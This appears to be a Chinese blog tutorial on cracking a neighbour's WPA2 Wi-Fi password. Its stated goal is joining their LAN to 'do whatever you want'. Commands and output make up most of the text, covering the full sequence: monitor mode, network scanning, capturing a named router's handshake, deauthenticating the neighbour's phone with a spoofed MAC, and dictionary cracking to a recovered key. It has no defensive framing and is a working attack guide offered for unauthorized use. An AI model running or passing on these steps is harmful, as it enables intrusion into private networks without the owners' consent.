Linux wifi 破解
【本文谢绝转载】本文目标:获取路由器的wifi密码,得到密码,你就和隔壁老王在一个局域网了,想干啥干啥
1,环境准备
2,工具安装
3,设置网卡工作方式
4,扫描wifi频道
5,监听频道握手数据包
6,攻击
7,暴力破解握手数据
8,得到密码
9,想干啥干啥
暴力破解效果图: 密码是 PV9KFHRF
怎么干活? -- 环境准备:
笔记本一个,带有无线网卡的。
操作系统:Ubuntu 14.04
无线网卡不配置IP
工具下载:
文件下载:国内有墙,下载需要另寻他法。
http://download.aircrack-ng.org/aircrack-ng-1.2-rc4.tar.gz
百度自己搜索自己喜欢的密码字典。
2,
依赖安装,解压,安装【耗时2分钟】
$ sudo apt-get install build-essential libssl-dev pkg-config libnl-3-dev libnl-genl-3-dev ethtool
chunli@http://990487026.blog.51cto.com:~/wifi$ tar xf aircrack-ng-1.2-rc4.tar.gz
chunli@http://990487026.blog.51cto.com:~/wifi$ cd aircrack-ng-1.2-rc4/
chunli@http://990487026.blog.51cto.com:~/wifi/aircrack-ng-1.2-rc4$ make
chunli@http://990487026.blog.51cto.com:~/wifi/aircrack-ng-1.2-rc4$ echo $?
chunli@http://990487026.blog.51cto.com:~/wifi/aircrack-ng-1.2-rc4$ sudo make install
chunli@http://990487026.blog.51cto.com:~/wifi/aircrack-ng-1.2-rc4$ echo $?
3,设置wlan0设备为监听模式,【不是所有的网卡都支持监听模式】
监听网卡的设备是wlan0
ubuntu@ubuntu:~$ sudo airmon-ng start wlan0
如果想关闭监听:sudo airmon-ng stop wlan0mon
键入上述命令,返回信息如果是下面这样的,无法开启监听模式的网卡,
可能驱动有问题或者网卡本身支持,具体查网卡芯片资料
Your kernel supports rfkill but you don't have rfkill installed.
To ensure devices are unblocked you must install rfkill.
Found 4 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to run 'airmon-ng check kill'
PID Name
356 wpa_supplicant
519 avahi-daemon
543 avahi-daemon
635 dhcpcd
PHYInterfaceDriverChipset
nullwlan0??????Realtek Semiconductor Corp. RTL8192CU 802.11n WLAN Adapter
这是正常显示的信息:
ubuntu@ubuntu:~$ sudo airmon-ng start wlan0
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to run 'airmon-ng check kill'
PID Name
1230 avahi-daemon
1231 avahi-daemon
1709 NetworkManager
2097 wpa_supplicant
PHYInterfaceDriverChipset
phy0wlan0ath9kQualcomm Atheros AR9485 Wireless Network Adapter (rev 01)
(mac80211 monitor mode vif enabled for wlan0 on wlan0mon)
(mac80211 station mode vif disabled for wlan0)
查看附近的wifi工作的频道
ubuntu@ubuntu:~$ sudo airodump-ng wlan0mon
CH7 ][ Elapsed: 2 mins ][ 2016-07-28 07:45
BSSIDPWRBeacons #Data, #/sCHMB ENCCIPHER AUTH ESSID
B0:48:7A:17:B3:0E-48 2980 0 654e. WPA2 CCMP PSKabc
5C:63:BF:BA:67:3E-53 6450 0 454e. WPA2 CCMP PSKxiaomiAP
5C:E3:B6:0A:16:58-58 3899 01154eWPA2 CCMP PSKChinaNet-T5Y6
00:03:0F:58:EB:D0-59 3120 01154e. WPA2 CCMP PSKMangirl
5C:E3:B6:0A:27:40-63 2660 01154eWPA2 CCMP PSK9105
5C:E3:B6:0A:22:70-80 330 0 754eWPA2 CCMP PSK9203
查看附近路由器与终端的连接状态,将抓到的握手包,保存为wifi_linux
老王的路由器ChinaNet-T5Y6在 11号频道,这个命令不要终止
$ sudo airodump-ng --bssid 路由器MAC -c 路由器频道 -w 保存文件名 wlan0mon
#-w 是抓的包输出目录,注意加-c,
不然airodump-ng会每个频道都会试,一直乱跳,下一步工作不好进行。
ubuntu@ubuntu:~$ sudo airodump-ng --ivs -w wifi_linux -c 11 wlan0mon
CH 11 ][ Elapsed: 42 s ][ 2016-07-28 07:51
BSSIDPWR RXQBeacons #Data, #/sCHMB ENCCIPHER AUTH ESSID
5C:E3:B6:0A:2C:20 -1 000 011-1<length:0>
5C:E3:B6:0A:16:58-40 100 4105 01154eWPA2 CCMP PSKChinaNet-T5Y6
5C:E3:B6:0A:27:40-52 100 4090 01154eWPA2 CCMP PSK9105
00:03:0F:58:EB:D0-58 100 4100 01154e. WPA2 CCMP PSKMangirl
5C:63:BF:BA:67:3E-71 6 330 0 454e. WPA2 CCMP PSKxiaomiAP
5C:E3:B6:03:0E:40-8251 3870 01154eWPA2 CCMP PSK10105
5C:E3:B6:03:0E:44-8248 3990 01154eOPNaWiFi-YQ-10B105
00:03:0F:58:D6:70-8446 2620 01154e. WPA2 CCMP PSKMangirl
5C:E3:B6:0A:2C:A0-89 0 950 01154eWPA2 CCMP PSK9303
EC:26:CA:A0:0A:79-9225 1670 01154e. WPA2 CCMP PSKYXCT
00:03:0F:58:E3:B0-92 2 780 01154e. WPA2 CCMP PSKMangirl
BSSIDSTATION PWR Rate Lost FramesProbe
5C:E3:B6:0A:2C:2080:56:F2:63:F0:C5-90 0 - 1 03
(not associated) D8:B0:4C:E0:A1:1A-81 0 - 1 09
(not associated) B4:6D:83:98:AC:88-89 0 - 1 01
(not associated) 64:09:80:D3:E4:B7-91 0 - 1 02yasha1909-2,homeinns
5C:E3:B6:0A:16:58AC:F7:F3:87:37:38-49 0 - 1 0 49
5C:E3:B6:0A:16:58AC:F7:F3:87:37:38-49 0 - 1 0 49
可以看出路由器5C:E3:B6:0A:16:58 与老王的手机AC:F7:F3:87:37:38 处于连接
新打开一个窗口,发送链接断开包:
ubuntu@ubuntu:~$ sudo aireplay-ng -0 1 -a 5C:E3:B6:0A:16:58-h AC:F7:F3:87:37:38wlan0mon
The interface MAC (24:FD:52:E0:F6:D5) doesn't match the specified MAC (-h).
ifconfig wlan0mon hw ether AC:F7:F3:87:37:38
07:57:54Waiting for beacon frame (BSSID: 5C:E3:B6:0A:16:58) on channel 11
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
07:57:54Sending DeAuth to broadcast -- BSSID:
ubuntu@ubuntu:~$
在【查看附近路由器与终端的连接状态】这个窗口可以看到握手包,
如果没有发现握手包,就多发几次
CH 11 ][ Elapsed: 9 mins ][ 2016-07-28 08:00 ][ WPA handshake: 5C:E3:B6:0A:16:58
破解握手包:
需要握手包文件,字典
ubuntu@ubuntu:~$ aircrack-ng -w dict wifi_linux-01.ivs
Aircrack-ng 1.2 rc4
1/1 keys tested (112.40 k/s)
Time left: 0 seconds 100.00%
KEY FOUND! [ PV9KFHRF ]
Master Key : C4 EA D4 FB DF 49 21 A5 D6 70 13 99 B1 1C 32 65
D5 21 5D 21 DE 1A 1C D3 7F 66 0A B0 C6 52 D0 ED
Transient Key: 75 BB B8 D0 4D 72 EA 73 A4 63 3F 1A 20 9B CE 52
9E A4 B0 FB 87 A4 62 B6 AB 1D B0 8B 5E 7E 28 7B
39 15 D8 3B F1 89 6F 14 BA 5A 90 A0 14 0F B5 12
E3 CA 5F D0 7B 25 A9 70 E8 09 F7 2D A3 E4 A9 6C
EAPOL HMAC : E8 17 F9 7F 86 9A F7 5C 55 51 99 BD 11 F2 92 35
u
字典举例:
ubuntu@ubuntu:~$ cat dict
123
345
6
7
a8
PV9KFHRF
ubuntu@ubuntu:~$
页:
[1]